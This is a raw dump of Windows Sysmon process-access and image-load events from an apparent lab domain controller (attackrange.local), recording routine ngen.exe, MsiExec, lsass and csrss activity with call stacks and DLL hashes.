14:57:20.733{A7A01FEF-EBD0-607E-F50B-00000000BB01}26603896C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-F40B-00000000BB01}6524c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.718{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F50B-00000000BB01}2660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.718{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F40B-00000000BB01}6524c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.718{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-F40B-00000000BB01}6524c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.718{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F20B-00000000BB01}6536c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.718{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F20B-00000000BB01}6536c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.718{A7A01FEF-EBD0-607E-F20B-00000000BB01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.686{A7A01FEF-EBD0-607E-F30B-00000000BB01}13166172C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-F20B-00000000BB01}6536c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.686{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F30B-00000000BB01}1316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.671{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F20B-00000000BB01}6536c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.671{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-F20B-00000000BB01}6536c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.671{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F00B-00000000BB01}3544c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.671{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F00B-00000000BB01}3544c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.671{A7A01FEF-EBD0-607E-F00B-00000000BB01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.655{A7A01FEF-EBD0-607E-F10B-00000000BB01}13603756C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-F00B-00000000BB01}3544c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.640{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F10B-00000000BB01}1360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.640{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F00B-00000000BB01}3544c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.640{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-F00B-00000000BB01}3544c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.624{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-EE0B-00000000BB01}6852c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.624{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-EE0B-00000000BB01}6852c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.624{A7A01FEF-EBD0-607E-EE0B-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.608{A7A01FEF-EBD0-607E-EF0B-00000000BB01}37524520C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-EE0B-00000000BB01}6852c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.608{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-EF0B-00000000BB01}3752C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.593{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-EE0B-00000000BB01}6852c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.593{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-EE0B-00000000BB01}6852c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.593{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-EC0B-00000000BB01}1388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.593{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-EC0B-00000000BB01}1388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.593{A7A01FEF-EBD0-607E-EC0B-00000000BB01}1388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.577{A7A01FEF-EBD0-607E-ED0B-00000000BB01}61407044C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-EC0B-00000000BB01}1388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.561{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-ED0B-00000000BB01}6140C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.561{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-EC0B-00000000BB01}1388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.561{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-EC0B-00000000BB01}1388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 